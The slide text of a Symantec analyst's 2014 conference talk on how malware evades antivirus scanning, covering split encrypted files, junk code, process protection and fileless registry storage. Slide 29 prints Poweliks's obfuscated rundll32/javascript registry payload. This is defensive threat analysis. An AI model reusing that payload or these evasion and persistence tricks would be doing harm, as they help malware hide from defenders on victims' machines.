SlideShare a Scribd company logo

CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

CODE BLUE
CODE BLUE

In this lecture, problems of existing antivirus software based of file scan will be discussed. For discussing the problem, latest methods of how attackers avoid the antivirus detection will be explained by dealing with a malware sample detected as Trojan.Blueso and by explaining with such as the construction of files and the principle of operation.

Technology
1 of 32
Download to read offline
How  malware  avoid  An/  Virus  scanning   Hiroshi  Shinotsuka   Threat  Analysis  Engineer
Self-­‐introduc/on   Copyright  ©  2014  Symantec  Corpora;on   2   •  Threat  analysis  engineer  in  Symantec.   •  Analyze  suspicious  file  and  create  An;-­‐Virus  signature   •  Provide  detailed  technical  descrip;on  to  customers  on   demand   •  Publically  provide  malware-­‐related  informa;on  
Copyright  ©  2014  Symantec  Corpora;on   3   24  hours  x  365  days  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   4  
Trojan.Blueso  detec/on Copyright  ©  2014  Symantec  Corpora;on   5   0   5,000   10,000   15,000   20,000   25,000   30,000   35,000   Trojan.Blueso   August   September   October   November  
Trojan.Blueso  file  structure   Copyright  ©  2014  Symantec  Corpora;on   6   RAR  self-­‐extrac/ng    file  13  MB   AutoIt     executable  file   Decryp;on  code   script  file Decryp;on  key   configura;on  file Encrypted  code AutoIt  is  a  programing  language  for  MicrosoW  Windows  plaYorm.  The  AutoIt   syntax  is  very  similar  to  that  of  BASIC  programing  language  and  is  designed  to   automate  the  Windows  GUI. RAR  self-­‐extrac;ng  file  drops  4   files,  then  it  execute  AutoIt   script  
Decrypted   code   Bluso  inject  Backdoor.Trojan   Copyright  ©  2014  Symantec  Corpora;on   7   Code   Decryp;on  key   Encrypted  code   Legi;mate    Windows  Process   Decryp;on   Part  of   Decrypted   code   Internet  Explorer   Process   Decry pted   code   AutoIt  executable  
Watch  Dog  monitor   Copyright  ©  2014  Symantec  Corpora;on   8   File  deleted   Process  deleted   Create  Process   Inject   Create  File   Trojan.Blueso  make  file/registry/process  again   if  An;virus  delete  it.  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   9  
Tradi/onal  sample   Copyright  ©  2014  Symantec  Corpora;on   10   Packer  /  Self  update   •  Harder  to  detect  encrypted  files.   •  Tradi;onal  sample  stored  all  informa;on  in  single  file. Code   Decryp;on  key   Encrypted   code Code   Decrypted   malicious  code  
New  technique  to  avoid  detec/on   Copyright  ©  2014  Symantec  Corpora;on   11   Tradi;onally  malware  saved  decrypted  image  to  a  file  and  executed.  An;virus   scanner  detects  malware  when  malware  saved  it  decrypted  image  onto  the   disk.   New  technique  is  to  inject  decrypted  image  to  a  new  running  process  and   executes  in  order  to  avoid  detec;on  by  file  scan.   Decrypted   malicious  code   Legi;mate    Windows  Process  Decrypt  in  memory   Decrypted   malicious  code  Code   Decryp;on  key   Encrypted  code AutoIt  executable  
File  detail   Copyright  ©  2014  Symantec  Corpora;on   12   Code   Decryp;on  key   Encrypted  code
An;Virus  scanner  scans  each  file.   Why  aBacker  split  malware  into  four  separate  files   Copyright  ©  2014  Symantec  Corpora;on   13   AutoIt  executable   Decryp;on  code   Decryp;on  key   Seeng  file Encrypted  code Scan   Scan   Scan   Scan  
What  does  this  mean?   •  Hiding  malicious  code  by  encryp;ng   •  Store  code,  decryp;on  key,  encrypted  code  in  separate  files.   •  An;virus  scanner  can’t  determine  ‘encrypted  code’  as  malicious   file.   •  An;virus  scanner  can’t  detect  the  file  without  understanding   rela;onships  between  mul;ple  files.   Copyright  ©  2014  Symantec  Corpora;on   14  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   15  
Code(Beginning  of  file)   Copyright  ©  2014  Symantec  Corpora;on   16   I  TAB  character  is  replaced  with  1  byte  string   You  only  see  junk  comment  lines  !  
Code  (Sample  1)   Copyright  ©  2014  Symantec  Corpora;on   17  
Code  (Sample  2)   Copyright  ©  2014  Symantec  Corpora;on   18  
Code   Copyright  ©  2014  Symantec  Corpora;on   19   Finally,  at  line  23670,  16MB  in  size,  important  code  is  reached.   87476  lines  of  AutoIt  script  codes.   Only  900  lines  without  comment  lines.   Only  1%  important  codes.
An/virus  scan  method   Copyright  ©  2014  Symantec  Corpora;on   20   •  An;virus  scanner  needs  to  have  balance  between  detec;on  and   performance   •  An;virus  scanner  first  determines  file  types  and  starts  file  scan   based  on  the  detected  file  type.   Executable  file ZIP  file JPEG  file
No  special  file  structure  in  text  file/script  file. Copyright  ©  2014  Symantec  Corpora;on   21   Script  files  have  no  file-­‐header,  which  means  the  files  have  no  special   file  structure.   An;virus  scanner  needs  to  run  a  par;al  scan  and  determine  what  the   file  is.   Very  difficult  to  keep  scan  performance  if  malicious  script  has  so  many   comment/junk  code.
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   22  
How  does  Blueso  start  and  protect  itself?   Copyright  ©  2014  Symantec  Corpora;on   23   Code   Decryp;on  key   Encrypted  code Legi;mate    Windows  Process   Decryp;on   Internet  Explorer   process   Malware  !! Malware  ?? What  is  wrong  ?? AutoIt   executable  
Process  protec/on  mechanism   Copyright  ©  2014  Symantec  Corpora;on   24   1)  Terminate  Internet  Explorer   -­‐>  Malicious  code  injected  into  Legi;mate  Windows  Process  is  executed  again   2)  Terminate  Legi;mate  Windows  Process   -­‐>  Running  script  on  AutoIt  execute  again   3)  Terminate  AutoIt  ?   -­‐>  Handle  AutoIt  executable  as  an  essen;al  process  for  Windows    system  by  using   undocumented  API  NtSetInforma;onProcess   As  soon  as  AutoIT  is  terminated,  Windows  determines  it  as  unrecoverable  cri;cal   problem.   -­‐>  Blue  Screen  Of  Death  !!  
Blue  Screen  Of  Death   Copyright  ©  2014  Symantec  Corpora;on   25  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   26  
Example  of  malware  store  code/data  in  irregular   place(Bamital)   Copyright  ©  2014  Symantec  Corpora;on   27   Set  registry  entry  to  start  a  code  when  windows  restarts.   HKEY_LOCAL_MACHINEsystemCurrentControlSetControlSession  Manager AppCertDlls"AppSecDll"  =   "%USER_Profile%Local  SeengsApplica;on  DataWindows  Serverxblscp.dll“   Because  of  analysis  already  performed,  xblscp.dll  is  determined  as  a  malicious  file.   Stricktly  speaking,  does  this  file  have  malicious  code  in  it?  
Example  of  malware  store  code/data  in  irregular  place   (Bamital)2   Copyright  ©  2014  Symantec  Corpora;on   28   How  it  works   •  Allocate  memory   •  Store  data  from  registry  to  the  allocated  memory •  Call  the  allocated  memory An;virus  scanner  doe  not  know  data  rule.  The  data  is  wriven  in   registry.   Another  malware  uses  same  technique  by  file.
Example  of  malware  store  code/data  in  irregular   place(Poweliks)   Copyright  ©  2014  Symantec  Corpora;on   29   Trojan.Poweliks  writes  a  Windows  Powershell  script  to  registry. You  can  find  this  registry  entry  may  execute  encrypted  java  script.   Encrypted  code  that  should  be  decrypted  in  different  registry  entry. HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{73E709EA-­‐5D93-­‐4B2E-­‐ BBB0-­‐99B7938DA9E4}LocalServer32(Default)  =   rundll32.exe  javascript:"..mshtml,RunHTMLApplica;on  ";eval("epdvnfou/xsjuf) (=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/ S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*, (=0tdsjqu?(*".replace(/./g,func;on(_){return %20String.fromCharCode(_.charCodeAt()-­‐1);}))   "a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@  
Conclusion   Copyright  ©  2014  Symantec  Corpora;on   30   •  Avackers  discover  new  techniques  every  day.   •  Avackers  employ  techniques  to  make  malware  removal  difficult   •  File  based  scanning  is  no  longer  effec;ve   •  Mul;-­‐layered  security  is  becoming  more  important  
&  Q   A   Copyright  ©  2014  Symantec  Corpora;on   31  
Thank  you!   Copyright  ©  2014  Symantec  Corpora/on.  All  rights  reserved.  Symantec  and  the  Symantec  Logo  are  trademarks  or  registered  trademarks  of  Symantec  Corpora;on  or  its  affiliates   in  the  U.S.  and  other  countries.    Other  names  may  be  trademarks  of  their  respec;ve  owners.   This  document  is  provided  for  informa;onal  purposes  only  and  is  not  intended  as  adver;sing.    All  warran;es  rela;ng  to  the  informa;on  in  this  document,  either  express  or   implied,  are  disclaimed  to  the  maximum  extent  allowed  by  law.    The  informa;on  in  this  document  is  subject  to  change  without  no;ce.   Hiroshi  Shinotsuka  

Recommended

An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition Fraunhofer AISEC
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesVi Tính Hoàng Nam
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingVi Tính Hoàng Nam
 
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Student
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...CODE BLUE
 

Recommended

An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition Fraunhofer AISEC
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesVi Tính Hoàng Nam
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingVi Tính Hoàng Nam
 
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Student
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...CODE BLUE
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackersAntonio Parata
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksVi Tính Hoàng Nam
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsAsep Sopyan
 
Verification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresVerification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresIRJET Journal
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingAsep Sopyan
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNorth Texas Chapter of the ISSA
 
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Positive Hack Days
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its DefenceGreater Noida Institute Of Technology
 
Ids & ips
Ids & ipsIds & ips
Ids & ipsLan & Wan Solutions
 
Ceh v5 module 00 student introduction
Ceh v5 module 00 student introductionCeh v5 module 00 student introduction
Ceh v5 module 00 student introductionVi Tính Hoàng Nam
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsCisco DevNet
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)SURBHI SAROHA
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVThomas Roccia
 
Security in network
Security in networkSecurity in network
Security in networkDaNang University of Technology
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesLastline, Inc.
 

More Related Content

What's hot

HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksVi Tính Hoàng Nam
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsAsep Sopyan
 
Verification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresVerification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresIRJET Journal
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingAsep Sopyan
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Positive Hack Days
 
Ceh v5 module 00 student introduction
Ceh v5 module 00 student introductionCeh v5 module 00 student introduction
Ceh v5 module 00 student introductionVi Tính Hoàng Nam
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsCisco DevNet
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)SURBHI SAROHA
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVThomas Roccia
 

What's hot (20)

HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackers
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networks
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
 
Verification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresVerification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP Cores
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New World
 
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Ids & ips
Ids & ipsIds & ips
Ids & ips
 
Ceh v5 module 00 student introduction
Ceh v5 module 00 student introductionCeh v5 module 00 student introduction
Ceh v5 module 00 student introduction
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
 
Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
Security in network
Security in networkSecurity in network
Security in network
 

Similar to CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesLastline, Inc.
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineLastline, Inc.
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxdawitTerefe5
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Applying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.MonateApplying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.MonateMahaut Gouhier
 
Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?F-Secure Corporation
 
Securing your Cloud Environment
Securing your Cloud EnvironmentSecuring your Cloud Environment
Securing your Cloud EnvironmentShapeBlue
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareMyNOG
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg Tunde Ogunkoya
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Ch07.ppt
Ch07.pptCh07.ppt
Ch07.pptImXaib
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industryRoberto Sponchioni
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesYOU SHENG CHEN
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 

Similar to CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA (20)

Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptx
 
WannaCry: How to Protect Yourself
WannaCry: How to Protect YourselfWannaCry: How to Protect Yourself
WannaCry: How to Protect Yourself
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets
 
Applying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.MonateApplying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.Monate
 
Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?
 
Securing your Cloud Environment
Securing your Cloud EnvironmentSecuring your Cloud Environment
Securing your Cloud Environment
 
D-Cipher
D-CipherD-Cipher
D-Cipher
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Ch07.ppt
Ch07.pptCh07.ppt
Ch07.ppt
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devices
 
Understanding Keylogger
Understanding KeyloggerUnderstanding Keylogger
Understanding Keylogger
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
